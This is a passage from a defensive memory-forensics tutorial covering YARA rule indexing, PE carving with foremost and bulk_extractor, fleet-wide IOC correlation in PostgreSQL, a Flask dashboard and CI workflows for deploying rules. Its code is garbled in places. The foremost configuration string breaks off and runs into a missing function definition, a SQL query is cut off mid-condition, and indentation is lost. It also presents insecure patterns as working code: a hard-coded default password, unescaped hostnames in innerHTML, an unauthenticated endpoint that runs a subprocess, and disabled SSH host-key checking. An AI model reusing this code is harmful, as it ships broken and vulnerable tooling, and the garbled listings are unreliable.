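Where the tool consuming the ruleset expects rule source rather than a compiled binary, one alternative is a small index file that pulls in every rule file through YARA's `include` directive. The sketch below is a minimal version of that idea. The function name `build_index` and the `index.yar` filename used in the usage note are illustrative and not part of the script above.

```python
from pathlib import Path


def build_index(rules_dir: Path, index_path: Path) -> int:
    """Write a YARA source file that includes every .yar file in rules_dir.

    Returns the number of rule files referenced. The index file itself is
    skipped if it lives in the same directory.
    """
    rule_files = sorted(
        p for p in rules_dir.glob('*.yar')
        if p.resolve() != index_path.resolve()
    )
    # Absolute POSIX-style paths keep the includes valid regardless of the working directory
    lines = [f'include "{p.resolve().as_posix()}"' for p in rule_files]
    index_path.write_text('\n'.join(lines) + '\n')
    return len(rule_files)
```

Calling `build_index(Path('/srv/memory/yara_rules/rules'), Path('/srv/memory/yara_rules/index.yar'))` would produce one `include` line per rule file. Unlike the compiled output, the result stays human-readable and can be diffed.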
Memory carving: recovering deleted files and artefacts
Memory carving is distinct from Volatility plugin analysis. Where Volatility works with the structured data in a memory image (process tables, VAD trees, network structures), carving treats the image as a raw byte stream and searches for known file signatures. This recovers files that were loaded into memory and may no longer be accessible through normal OS structures: documents opened and closed before the image was taken, executables that were loaded and unmapped, scripts that ran entirely in memory, and configuration files that were decrypted and used.
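The core idea of signature carving can be sketched in a few lines. The function below (`find_pe_offsets`, an illustrative name) scans a raw buffer for the `MZ` magic and keeps only the offsets where the `e_lfanew` field at offset 0x3C points to a `PE\0\0` signature, which filters out most coincidental `MZ` byte pairs. Real carvers such as foremost add size limits and output handling on top of this, and the `max_lfanew` cap is an assumption chosen here to reject implausible headers.

```python
import struct
from typing import List


def find_pe_offsets(buf: bytes, max_lfanew: int = 0x1000) -> List[int]:
    """Return offsets in buf that look like the start of a PE image."""
    offsets = []
    pos = buf.find(b'MZ')
    while pos != -1:
        # A DOS header is 0x40 bytes; e_lfanew is its last 4-byte field
        if pos + 0x40 <= len(buf):
            (e_lfanew,) = struct.unpack_from('<I', buf, pos + 0x3C)
            pe_at = pos + e_lfanew
            if e_lfanew <= max_lfanew and buf[pe_at:pe_at + 4] == b'PE\x00\x00':
                offsets.append(pos)
        pos = buf.find(b'MZ', pos + 1)
    return offsets
```

For a multi-gigabyte image the same loop would be run over an `mmap` of the file rather than a `bytes` object held in memory.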
## Automated memory carving pipeline stage
## Integrates with the main Celery pipeline
#!/usr/bin/env python3
"""
Memory carving using bulk_extractor and foremost against memory images.
Focuses on security-relevant carving: executables, scripts, documents, certificates.
"""
import subprocess
import shutil
import json
import logging
from pathlib import Path
from typing import List, Dict
log = logging.getLogger(__name__)
# File types to carve - focused on security-relevant artefacts
FOREMOST_CONFIG = """
# Foremost config for memory forensics
# Focus on executable and document types
# Windows executables
exe y 4000000 \x4d\x5a
# DLL files (same signature as exe but worth carving separately)
dll y 4000000 \x4d\x5a
# PowerShell scripts (XML-based)
ps1 y 100000 Dict:
"""Run bulk_extractor and foremost against a memory image."""
output_path = Path(output_dir) / f'carved_{image_id}'
output_path.mkdir(parents=True, exist_ok=True)
results = {
'image_id': image_id,
'carved_files': {},
'bulk_extractor': {},
'interesting': [],
}
# ── bulk_extractor: extracts structured data ──────────────────────────────
# Much faster than foremost for structured extraction
bulk_out = output_path / 'bulk_extractor'
bulk_out.mkdir(exist_ok=True)
log.info(f"Running bulk_extractor on image {image_id}")
result = subprocess.run([
'bulk_extractor',
'-o', str(bulk_out),
# Scanners relevant to security investigations.
# url.txt and domain.txt are feature files written by the email scanner,
# and ip.txt by the net scanner; they are not scanners in their own right.
'-e', 'email', # Email addresses, URLs, domain names
'-e', 'base64', # Base64 encoded data
'-e', 'net', # Network packets and IP addresses
'-e', 'winpe', # Windows PE files
'-e', 'pdf', # PDF documents
'-e', 'zip', # ZIP/Office archives
'-e', 'json', # JSON data (configs, beacons)
image_path
], capture_output=True, text=True, timeout=3600)
if result.returncode == 0:
# Parse bulk_extractor output files
for feat_file in bulk_out.glob('*.txt'):
if feat_file.stat().st_size == 0:
continue
feature_name = feat_file.stem
lines = feat_file.read_text(errors='replace').splitlines()
# Filter comment lines
entries = [l for l in lines if l and not l.startswith('#')]
results['bulk_extractor'][feature_name] = len(entries)
# Flag high-value findings
if feature_name == 'url' and entries:
for entry in entries[:100]: # First 100 URLs
parts = entry.split('\t')
if len(parts) >= 2:
url = parts[1]
# Flag non-Microsoft, non-CDN URLs
if url.startswith('http') and not any(
d in url for d in [
'microsoft.com', 'windows.com', 'google.com',
'cloudflare.com', 'akamai.com'
]
):
results['interesting'].append({
'type': 'url',
'value': url,
'source': 'bulk_extractor'
})
# ── foremost: carves file signatures ─────────────────────────────────────
foremost_out = output_path / 'foremost'
foremost_out.mkdir(exist_ok=True)
# Write custom config
config_file = output_path / 'foremost.conf'
config_file.write_text(FOREMOST_CONFIG)
log.info(f"Running foremost on image {image_id}")
result = subprocess.run([
'foremost',
'-c', str(config_file),
'-o', str(foremost_out),
'-i', image_path,
'-q' # quiet mode
], capture_output=True, text=True, timeout=3600)
# Count carved files by type
for type_dir in foremost_out.iterdir():
if type_dir.is_dir() and type_dir.name != 'audit.txt':
file_list = list(type_dir.glob('*'))
count = len(file_list)
results['carved_files'][type_dir.name] = count
# Flag carved PE files for Yara scanning
if type_dir.name in ('exe', 'dll') and count > 0:
results['interesting'].append({
'type': 'carved_pe',
'value': f"{count} PE files carved from memory",
'path': str(type_dir),
'source': 'foremost'
})
log.info(f"Carving complete for image {image_id}: "
f"{sum(results['carved_files'].values())} files carved")
return results
def scan_carved_pes(carved_dir: str, yara_rules_path: str) -> List[Dict]:
"""Run Yara against carved PE files to identify malware families."""
import yara
if not Path(yara_rules_path).exists():
log.warning("Yara rules not found - skipping carved PE scan")
return []
rules = yara.load(yara_rules_path)
matches = []
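# Scan both carved .exe and .dll files, not only .exe
for pe_file in (p for p in Path(carved_dir).rglob('*') if p.suffix.lower() in ('.exe', '.dll')):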
try:
hits = rules.match(str(pe_file))
if hits:
matches.append({
'file': str(pe_file),
'rules': [h.rule for h in hits],
'size': pe_file.stat().st_size
})
log.warning(f"YARA HIT in carved file: {pe_file.name} -> {[h.rule for h in hits]}")
except Exception as e:
log.debug(f"Yara scan failed for {pe_file}: {e}")
return matches
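Because the `exe` and `dll` entries in the foremost configuration share the same `MZ` signature, the same bytes may be carved more than once. A minimal sketch of grouping carved files by SHA-256 before scanning follows, so that each unique file is examined once. `sha256_file` and `dedupe_by_hash` are illustrative helpers, not part of the carving stage above.

```python
import hashlib
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large carved files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest()


def dedupe_by_hash(carved_dir: str) -> Dict[str, List[str]]:
    """Map each SHA-256 digest to the list of carved file paths with that content."""
    groups: Dict[str, List[str]] = {}
    for path in sorted(Path(carved_dir).rglob('*')):
        if path.is_file():
            groups.setdefault(sha256_file(path), []).append(str(path))
    return groups
```

Scanning only the first path in each group avoids duplicate Yara hits, and the digests double as IOC values for cross-host comparison.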
Cross-image IOC correlation: finding attacker infrastructure across the fleet
Individual memory image analysis tells you what is happening on one machine. Cross-image correlation tells you the full scope of an intrusion: which machines have seen the same C2 IP, which machines have the same injected code hash, which machines ran the same attacker tool at approximately the same time. This is where the PostgreSQL backend pays off: all analysis results from all images are in the same database, queryable together.
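At its core the correlation is a group-by: collect the set of hosts on which each indicator was seen and keep the indicators that appear on more than one. The in-memory sketch below uses made-up observations (the hostnames and the documentation-range IP addresses are placeholders) and mirrors what the SQL in this section does with `COUNT(DISTINCT image_id)`. `shared_indicators` is an illustrative name.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple


def shared_indicators(observations: Iterable[Tuple[str, str]],
                      min_hosts: int = 2) -> List[Dict]:
    """Return indicators seen on at least min_hosts distinct hosts, most widespread first."""
    hosts_by_ioc = defaultdict(set)
    for hostname, ioc in observations:
        hosts_by_ioc[ioc].add(hostname)  # a set ignores repeat sightings on one host
    shared = [
        {'ioc': ioc, 'host_count': len(hosts), 'hostnames': sorted(hosts)}
        for ioc, hosts in hosts_by_ioc.items()
        if len(hosts) >= min_hosts
    ]
    return sorted(shared, key=lambda r: (-r['host_count'], r['ioc']))


# Placeholder data: (hostname, indicator) pairs
observations = [
    ('WS-001', '203.0.113.10'),
    ('WS-002', '203.0.113.10'),
    ('WS-002', '198.51.100.7'),
    ('SRV-01', '203.0.113.10'),
    ('WS-001', '203.0.113.10'),  # repeat sighting on the same host
]
for row in shared_indicators(observations):
    print(row)
```

Doing this in the database rather than in Python matters once the fleet grows, since the aggregation then runs next to the data.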
## cross_correlation.py - Fleet-wide IOC correlation analysis
#!/usr/bin/env python3
"""
Cross-image correlation engine.
Finds common IOCs, processes, and artefacts across all analysed memory images.
Produces a fleet-wide threat assessment showing attacker scope and pivot points.
"""
import psycopg2
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import List, Dict, Tuple
from collections import defaultdict
log = logging.getLogger(__name__)
POSTGRES_URL = 'postgresql://analyst:changeme@localhost/memory_analysis'
def get_db():
return psycopg2.connect(POSTGRES_URL)
def correlate_external_ips() -> List[Dict]:
"""Find external IP addresses seen in multiple memory images."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
nc.remote_addr,
nc.remote_port,
COUNT(DISTINCT nc.image_id) AS host_count,
ARRAY_AGG(DISTINCT mi.hostname ORDER BY mi.hostname) AS hostnames,
ARRAY_AGG(DISTINCT nc.process_name) AS processes
FROM network_connections nc
JOIN memory_images mi ON mi.id = nc.image_id
WHERE
nc.remote_addr != ''
AND nc.remote_addr != '0.0.0.0'
AND nc.remote_addr NOT LIKE '10.%'
AND nc.remote_addr !~ '^172[.](1[6-9]|2[0-9]|3[01])[.]'
AND nc.remote_addr NOT LIKE '192.168.%'
AND nc.remote_addr NOT LIKE '127.%'
AND mi.status = 'complete'
GROUP BY nc.remote_addr, nc.remote_port
HAVING COUNT(DISTINCT nc.image_id) >= 2
ORDER BY host_count DESC, nc.remote_addr
""")
rows = cur.fetchall()
results = []
for row in rows:
results.append({
'remote_ip': row[0],
'remote_port': row[1],
'host_count': row[2],
'hostnames': row[3],
'processes': row[4],
'severity': 'CRITICAL' if row[2] >= 5 else 'HIGH' if row[2] >= 2 else 'MEDIUM',
})
return results
def correlate_malfind_patterns() -> List[Dict]:
"""Find memory injection patterns seen across multiple hosts."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
mf.protection,
mf.has_pe_header,
mf.risk_level,
COUNT(DISTINCT mf.image_id) AS host_count,
ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,
ARRAY_AGG(DISTINCT mf.process_name) AS processes,
AVG(mf.entropy) AS avg_entropy
FROM malfind_results mf
JOIN memory_images mi ON mi.id = mf.image_id
WHERE mi.status = 'complete'
GROUP BY mf.protection, mf.has_pe_header, mf.risk_level
HAVING COUNT(DISTINCT mf.image_id) >= 2
ORDER BY host_count DESC
""")
rows = cur.fetchall()
results = []
for row in rows:
results.append({
'protection': row[0],
'has_pe_header':row[1],
'risk_level': row[2],
'host_count': row[3],
'hostnames': row[4],
'processes': row[5],
'avg_entropy': float(row[6]) if row[6] else 0,
})
return results
def correlate_iocs() -> List[Dict]:
"""Find IOC values seen across multiple memory images."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
ioc.ioc_type,
ioc.ioc_value,
COUNT(DISTINCT ioc.image_id) AS host_count,
ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,
ARRAY_AGG(DISTINCT ioc.process_name) AS processes,
MIN(mi.acquired_at) AS first_seen,
MAX(mi.acquired_at) AS last_seen
FROM iocs_extracted ioc
JOIN memory_images mi ON mi.id = ioc.image_id
WHERE mi.status = 'complete'
GROUP BY ioc.ioc_type, ioc.ioc_value
HAVING COUNT(DISTINCT ioc.image_id) >= 2
ORDER BY host_count DESC, ioc.ioc_type
""")
rows = cur.fetchall()
results = []
for row in rows:
results.append({
'ioc_type': row[0],
'ioc_value': row[1],
'host_count': row[2],
'hostnames': row[3],
'processes': row[4],
'first_seen': str(row[5]),
'last_seen': str(row[6]),
})
return results
def find_lateral_movement_timeline() -> List[Dict]:
"""
Attempt to reconstruct lateral movement by correlating
process creation times across hosts.
Looks for the same attacker tool running on multiple hosts
within a short time window.
"""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
WITH suspicious AS (
SELECT
pl.name,
pl.create_time,
mi.hostname,
pl.pid,
pl.cmd_line
FROM process_list pl
JOIN memory_images mi ON mi.id = pl.image_id
WHERE pl.is_suspicious = TRUE
AND pl.create_time IS NOT NULL
)
SELECT
s1.name,
s1.hostname AS first_host,
s1.create_time AS first_time,
s2.hostname AS second_host,
s2.create_time AS second_time,
EXTRACT(EPOCH FROM (s2.create_time - s1.create_time))/60 AS minutes_between
FROM suspicious s1
JOIN suspicious s2 ON
s1.name = s2.name
AND s1.hostname != s2.hostname
AND s2.create_time > s1.create_time
AND s2.create_time - s1.create_time < …
def generate_fleet_report() -> Dict:
"""Generate the complete fleet-wide correlation report."""
log.info("Running fleet-wide cross-image correlation")
# Count completed images
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
COUNT(*) AS total,
SUM(CASE WHEN status='complete' THEN 1 ELSE 0 END) AS complete,
SUM(CASE WHEN status LIKE '%running%' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status LIKE '%failed%' THEN 1 ELSE 0 END) AS failed,
COALESCE(SUM(CASE WHEN risk_score >= 50 THEN 1 ELSE 0 END), 0) AS critical_hosts
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
""")
fleet_stats = cur.fetchone()
shared_ips = correlate_external_ips()
shared_malfind = correlate_malfind_patterns()
shared_iocs = correlate_iocs()
lateral_mv = find_lateral_movement_timeline()
# Calculate overall threat level
critical_count = sum(1 for ip in shared_ips if ip['severity'] == 'CRITICAL')
overall_threat = (
'CRITICAL' if critical_count > 0 or fleet_stats[4] > 3 else
'HIGH' if len(shared_ips) > 0 or fleet_stats[4] > 0 else
'MEDIUM' if len(shared_iocs) > 0 else
'LOW'
)
report = {
'generated_at': datetime.now().isoformat(),
'overall_threat': overall_threat,
'fleet_stats': {
'total_images': fleet_stats[0],
'complete': fleet_stats[1],
'processing': fleet_stats[2],
'failed': fleet_stats[3],
'critical_hosts': fleet_stats[4],
},
'shared_c2_ips': shared_ips,
'shared_injection_patterns': shared_malfind,
'shared_iocs': shared_iocs,
'lateral_movement_indicators': lateral_mv,
'summary': (
f"Fleet analysis of {fleet_stats[0]} endpoints. "
f"Overall threat level: {overall_threat}. "
f"{len(shared_ips)} shared external IP(s), "
f"{fleet_stats[4]} critical host(s), "
f"{len(lateral_mv)} potential lateral movement indicator(s)."
)
}
# Save report
report_path = Path('/srv/memory/reports/fleet_correlation.json')
report_path.parent.mkdir(parents=True, exist_ok=True)
with open(report_path, 'w') as f:
json.dump(report, f, indent=2, default=str)
log.info(f"Fleet report saved to {report_path}")
log.info(f"Overall threat level: {overall_threat}")
if shared_ips:
log.warning(f"{len(shared_ips)} external IP(s) seen on multiple hosts (possible shared C2):")
for ip in shared_ips[:5]:
log.warning(f" {ip['remote_ip']}:{ip['remote_port']} on {ip['host_count']} hosts: {ip['hostnames']}")
return report
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')
report = generate_fleet_report()
print(json.dumps(report, indent=2, default=str))
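The threat-level precedence used in the report can be pulled out into a pure function, which makes it easy to unit test without a database. This is a minimal sketch; the function name `overall_threat_level` and its parameters are hypothetical and not part of the original script.

```python
def overall_threat_level(critical_ip_count: int, shared_ip_count: int,
                         shared_ioc_count: int, critical_hosts: int) -> str:
    """Mirror the report's precedence: the first matching rule wins."""
    if critical_ip_count > 0 or critical_hosts > 3:
        return 'CRITICAL'
    if shared_ip_count > 0 or critical_hosts > 0:
        return 'HIGH'
    if shared_ioc_count > 0:
        return 'MEDIUM'
    return 'LOW'


# SUM() over an empty table returns NULL (None in Python), so coerce
# the database value to an integer before comparing it.
critical_hosts_from_db = None
print(overall_threat_level(0, 0, 0, critical_hosts_from_db or 0))
print(overall_threat_level(0, 2, 5, 1))
```

Keeping the rule order in one place also makes it harder for the report and any later alerting logic to drift apart.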
The analyst dashboard
Raw pipeline output in a PostgreSQL database and JSON files is not usable under incident pressure. Analysts need a single view that shows which images are processing, which have completed, which have high-risk findings, and the cross-image correlation results. A lightweight Flask dashboard served by the Docker Compose stack provides this without requiring a full SIEM deployment.
## dashboard/app.py - Flask analyst dashboard
from flask import Flask, render_template, jsonify, request
import psycopg2
import psycopg2.extras
import json
import os
from datetime import datetime
app = Flask(__name__)
POSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql://analyst:changeme@localhost/memory_analysis')
def get_db():
conn = psycopg2.connect(POSTGRES_URL, cursor_factory=psycopg2.extras.RealDictCursor)
return conn
@app.route('/')
def index():
return render_template('dashboard.html')
@app.route('/api/fleet-status')
def fleet_status():
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
mi.id, mi.hostname, mi.status, mi.tier,
mi.image_size_gb, mi.received_at, mi.sha256,
tr.risk_score, tr.suspicious_process_count,
tr.has_malfind, tr.network_conn_count,
CASE
WHEN tr.risk_score IS NULL THEN NULL
WHEN tr.risk_score >= 50 THEN 'CRITICAL'
WHEN tr.risk_score >= 20 THEN 'HIGH'
WHEN tr.risk_score >= 5 THEN 'MEDIUM'
ELSE 'LOW'
END AS risk_label
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
ORDER BY tr.risk_score DESC NULLS LAST, mi.received_at DESC
""")
rows = cur.fetchall()
return jsonify([dict(r) for r in rows])
@app.route('/api/host/<image_id>')
def host_detail(image_id):
with get_db() as conn:
with conn.cursor() as cur:
# Suspicious processes
cur.execute("""
SELECT pid, ppid, name, path, cmd_line, suspicious_reason
FROM process_list
WHERE image_id = %s AND is_suspicious = TRUE
ORDER BY pid
""", (image_id,))
suspicious_procs = [dict(r) for r in cur.fetchall()]
# Malfind regions
cur.execute("""
SELECT pid, process_name, protection, has_pe_header,
entropy, risk_level, yara_matches
FROM malfind_results
WHERE image_id = %s
ORDER BY risk_level, entropy DESC
""", (image_id,))
malfind = [dict(r) for r in cur.fetchall()]
# Network connections
cur.execute("""
SELECT pid, process_name, remote_addr, remote_port, state, is_suspicious
FROM network_connections
WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'
ORDER BY is_suspicious DESC, remote_port
""", (image_id,))
connections = [dict(r) for r in cur.fetchall()]
# IOCs
cur.execute("""
SELECT ioc_type, ioc_value, process_name, confidence
FROM iocs_extracted
WHERE image_id = %s
ORDER BY ioc_type
""", (image_id,))
iocs = [dict(r) for r in cur.fetchall()]
return jsonify({
'suspicious_processes': suspicious_procs,
'malfind_regions': malfind,
'network_connections': connections,
'iocs': iocs,
})
@app.route('/api/fleet-correlation')
def fleet_correlation():
"""Return cross-image correlation results."""
report_path = '/srv/memory/reports/fleet_correlation.json'
try:
with open(report_path) as f:
return jsonify(json.load(f))
except FileNotFoundError:
return jsonify({'error': 'Correlation report not yet generated'}), 404
@app.route('/api/trigger-correlation', methods=['POST'])
def trigger_correlation():
"""Manually trigger fleet correlation analysis."""
import subprocess
subprocess.Popen(['python3', '/srv/memory/cross_correlation.py'])
return jsonify({'status': 'triggered'})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=False)
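The risk thresholds in the fleet-status query (50, 20, and 5) can be mirrored in Python if other parts of the pipeline need the same labels. The sketch below is an illustration only: `RISK_THRESHOLDS` and `risk_label` are hypothetical names, and returning `None` for an image with no triage row yet is a choice made here so that untriaged images are not shown as low risk.

```python
from typing import Optional

# Ordered from highest to lowest; the first threshold met wins.
RISK_THRESHOLDS = [(50, 'CRITICAL'), (20, 'HIGH'), (5, 'MEDIUM')]


def risk_label(score: Optional[float]) -> Optional[str]:
    """Map a triage risk score to the dashboard's label."""
    if score is None:
        # No triage result yet: report "unknown" rather than LOW.
        return None
    for threshold, label in RISK_THRESHOLDS:
        if score >= threshold:
            return label
    return 'LOW'


for sample in (72, 20, 4, None):
    print(sample, risk_label(sample))
```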
## dashboard/templates/dashboard.html - Single-page analyst interface
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Memory Analysis Dashboard</title>
<style>
* { box-sizing: border-box; margin: 0; padding: 0; }
body { font-family: 'JetBrains Mono', monospace; background: #0f172a; color: #e2e8f0; font-size: 13px; }
.header { background: #1e2433; padding: 16px 24px; border-bottom: 1px solid #334155; display: flex; align-items: center; gap: 16px; }
.header h1 { font-size: 16px; color: #f59e0b; }
.stats { display: flex; gap: 12px; margin-left: auto; }
.stat { background: #0f172a; padding: 6px 14px; border-radius: 6px; text-align: center; }
.stat-val { font-size: 18px; font-weight: 700; }
.stat-lbl { font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; }
.critical { color: #ef4444; } .high { color: #f97316; }
.medium { color: #eab308; } .low { color: #22c55e; }
.container { padding: 20px 24px; }
table { width: 100%; border-collapse: collapse; }
th { text-align: left; padding: 8px 12px; font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; border-bottom: 1px solid #1e293b; }
td { padding: 10px 12px; border-bottom: 1px solid #1e293b; }
tr:hover { background: #1e293b; cursor: pointer; }
.badge { display: inline-block; padding: 2px 8px; border-radius: 3px; font-size: 9px; font-weight: 600; }
.badge-critical { background: #450a0a; color: #ef4444; border: 1px solid #ef4444; }
.badge-high { background: #431407; color: #f97316; border: 1px solid #f97316; }
.badge-medium { background: #422006; color: #eab308; border: 1px solid #eab308; }
.badge-low { background: #052e16; color: #22c55e; border: 1px solid #22c55e; }
.status-pill { background: #1e293b; padding: 2px 8px; border-radius: 10px; font-size: 10px; }
.btn { background: #1e293b; border: 1px solid #334155; color: #94a3b8; padding: 6px 14px; border-radius: 6px; cursor: pointer; font-family: monospace; font-size: 11px; }
.btn:hover { border-color: #f59e0b; color: #f59e0b; }
</style>
</head>
<body>
<div class="header">
<h1>Memory Analysis Pipeline</h1>
<div class="stats">
<div class="stat"><div class="stat-val" id="total-count">-</div><div class="stat-lbl">Total</div></div>
<div class="stat"><div class="stat-val critical" id="critical-count">-</div><div class="stat-lbl">Critical</div></div>
<div class="stat"><div class="stat-val high" id="complete-count">-</div><div class="stat-lbl">Complete</div></div>
</div>
<button class="btn" onclick="triggerCorrelation()">Run Correlation</button>
<button class="btn" onclick="loadData()">Refresh</button>
</div>
<div class="container">
<table>
<thead><tr>
<th>Host</th><th>Tier</th><th>Risk</th>
<th>Status</th><th>Size</th><th>Suspicious Procs</th>
<th>Malfind</th><th>Connections</th>
</tr></thead>
<tbody id="host-table"></tbody>
</table>
</div>
<script>
async function loadData() {
const data = await fetch('/api/fleet-status').then(r => r.json());
document.getElementById('total-count').textContent = data.length;
document.getElementById('critical-count').textContent = data.filter(h => h.risk_label === 'CRITICAL').length;
document.getElementById('complete-count').textContent = data.filter(h => h.status === 'complete').length;
const tbody = document.getElementById('host-table');
tbody.innerHTML = data.map(h => `
<tr onclick="window.open('/api/host/${h.id}','_blank')">
<td style="font-weight:600">${h.hostname}</td>
<td>T${h.tier || '-'}</td>
<td><span class="badge badge-${(h.risk_label||'low').toLowerCase()}">${h.risk_label || 'N/A'}</span></td>
<td><span class="status-pill">${h.status}</span></td>
<td>${h.image_size_gb ? h.image_size_gb.toFixed(1) + ' GB' : '-'}</td>
<td style="color:${h.suspicious_process_count > 0 ? '#f97316' : '#64748b'}">${h.suspicious_process_count || 0}</td>
<td style="color:${h.has_malfind ? '#ef4444' : '#64748b'}">${h.has_malfind ? 'YES' : 'no'}</td>
<td>${h.network_conn_count || 0}</td>
</tr>
`).join('');
}
async function triggerCorrelation() {
await fetch('/api/trigger-correlation', {method: 'POST'});
alert('Correlation analysis triggered. Refresh in 60 seconds.');
}
loadData();
setInterval(loadData, 30000);
</script>
</body>
</html>
The CI/CD pipeline: GitHub Actions for automated ruleset deployment
The Yara ruleset, pipeline configuration, and correlation scripts need to be version controlled and automatically deployed when updated. A GitHub Actions workflow handles this: when a new Yara rule is pushed to the repository, the action compiles the full ruleset, tests it against clean samples, and deploys the updated compiled ruleset to the analysis server. This keeps the detection capability current without manual SSH sessions.
## .github/workflows/deploy_rules.yml
## Triggered on push to main branch when Yara rules change
name: Compile and Deploy Yara Rules
on:
push:
branches: [main]
paths:
- 'yara_rules/**'
- 'pipeline/**'
- 'requirements.txt'
jobs:
compile-and-test:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install yara-python pefile
sudo apt-get install -y yara
- name: Lint Yara rules individually
run: |
echo "Checking individual rule files..."
ERRORS=0
for rule_file in yara_rules/rules/*.yar; do
if ! yara "$rule_file" /dev/null 2>/dev/null; then
echo "SYNTAX ERROR: $rule_file"
ERRORS=$((ERRORS + 1))
else
echo "OK: $rule_file"
fi
done
if [ $ERRORS -gt 0 ]; then
echo "Found $ERRORS rule file(s) with errors"
exit 1
fi
- name: Compile combined ruleset
run: |
python3 pipeline/compile_rules.py
echo "Compiled ruleset size: $(du -sh yara_rules/combined.yar)"
- name: Test for false positives
run: |
# Smoke-test the ruleset against a few known-clean binaries present on the runner.
# In production, replace these with a curated set of known-clean Windows samples.
echo "Running false positive checks..."
python3 -c "
import yara, os
rules = yara.compile('yara_rules/combined.yar')
clean_bins = ['/bin/ls', '/bin/cat', '/usr/bin/python3']
fps = 0
for f in clean_bins:
if os.path.exists(f):
matches = rules.match(f)
if matches:
print(f'FP: {f} matched {[m.rule for m in matches]}')
fps += 1
print(f'False positive check: {fps} hits in clean files')
exit(fps > 2)
"
- name: Upload compiled ruleset artifact
uses: actions/upload-artifact@v4
with:
name: compiled-yara-rules
path: yara_rules/combined.yar
retention-days: 30
deploy:
needs: compile-and-test
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
environment: production
steps:
- name: Download compiled ruleset
uses: actions/download-artifact@v4
with:
name: compiled-yara-rules
- name: Deploy to analysis server
env:
DEPLOY_KEY: ${{ secrets.ANALYSIS_SERVER_DEPLOY_KEY }}
ANALYSIS_SERVER: ${{ secrets.ANALYSIS_SERVER_HOST }}
run: |
echo "$DEPLOY_KEY" > /tmp/deploy_key
chmod 600 /tmp/deploy_key
# Copy compiled rules to analysis server
scp -i /tmp/deploy_key -o StrictHostKeyChecking=no \
combined.yar \
analyst@$ANALYSIS_SERVER:/srv/memory/yara_rules/combined.yar
# Verify deployment (this only lists the file; running scans are not restarted)
ssh -i /tmp/deploy_key -o StrictHostKeyChecking=no \
analyst@$ANALYSIS_SERVER \
'ls -lh /srv/memory/yara_rules/combined.yar && echo "Deployment verified"'
rm /tmp/deploy_key
- name: Notify on deployment
if: success()
run: |
echo "Yara ruleset deployed at $(date -u)"
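The inline false-positive check in the workflow can also live in a standalone script, which is easier to test and extend than a `python3 -c` string. The following is a rough sketch under stated assumptions: `false_positive_hits` and `gate_exit_code` are hypothetical helper names, and the matcher is passed in as a callable so the logic can be exercised without yara-python installed.

```python
from typing import Callable, Iterable, List, Tuple


def false_positive_hits(match_fn: Callable[[str], List[str]],
                        clean_paths: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Return (path, matched rule names) for every clean file that matched."""
    hits = []
    for path in clean_paths:
        rule_names = match_fn(path)
        if rule_names:
            hits.append((path, rule_names))
    return hits


def gate_exit_code(hits: list, max_allowed: int = 2) -> int:
    """Return 0 to pass the CI step, 1 to fail it."""
    return 1 if len(hits) > max_allowed else 0


# With yara-python installed, the matcher could be built like this:
#   rules = yara.compile('yara_rules/combined.yar')
#   match_fn = lambda p: [m.rule for m in rules.match(p)]
demo = {'/bin/ls': [], '/bin/cat': ['Example_Rule']}
hits = false_positive_hits(lambda p: demo[p], demo)
print(hits, gate_exit_code(hits))
```

The default of two tolerated hits matches the threshold in the workflow above; a stricter gate would set `max_allowed=0`.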
## .github/workflows/pipeline_tests.yml
## Integration tests for the processing pipeline
name: Pipeline Integration Tests
on:
push:
paths:
- 'pipeline/**'
pull_request:
paths:
- 'pipeline/**'
jobs:
test-pipeline:
runs-on: ubuntu-latest
services:
redis:
image: redis:7-alpine
ports:
- 6379:6379
postgres:
image: postgres:15-alpine
env:
POSTGRES_DB: memory_analysis
POSTGRES_USER: analyst
POSTGRES_PASSWORD: testpassword
ports:
- 5432:5432
options: --health-cmd pg_isready --health-interval 10s
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r requirements.txt
pip install pytest pytest-asyncio
- name: Initialize test database
env:
PGPASSWORD: testpassword
run: |
psql -h localhost -U analyst -d memory_analysis -f init_db.sql
- name: Run unit tests
env:
CELERY_BROKER_URL: redis://localhost:6379/0
POSTGRES_URL: postgresql://analyst:testpassword@localhost/memory_analysis
run: |
pytest tests/ -v --tb=short
- name: Test pipeline task imports
env:
CELERY_BROKER_URL: redis://localhost:6379/0
POSTGRES_URL: postgresql://analyst:testpassword@localhost/memory_analysis
run: |
python3 -c "
from pipeline.pipeline import (
validate_image, run_triage, run_deep_analysis,
extract_iocs, generate_report
)
print('All pipeline tasks imported successfully')
"
Operational runbook: running the pipeline during an active incident
All of the above infrastructure is built to run with minimal manual intervention during an incident. The following runbook describes the complete workflow from initial decision to collect through to analyst review of results.
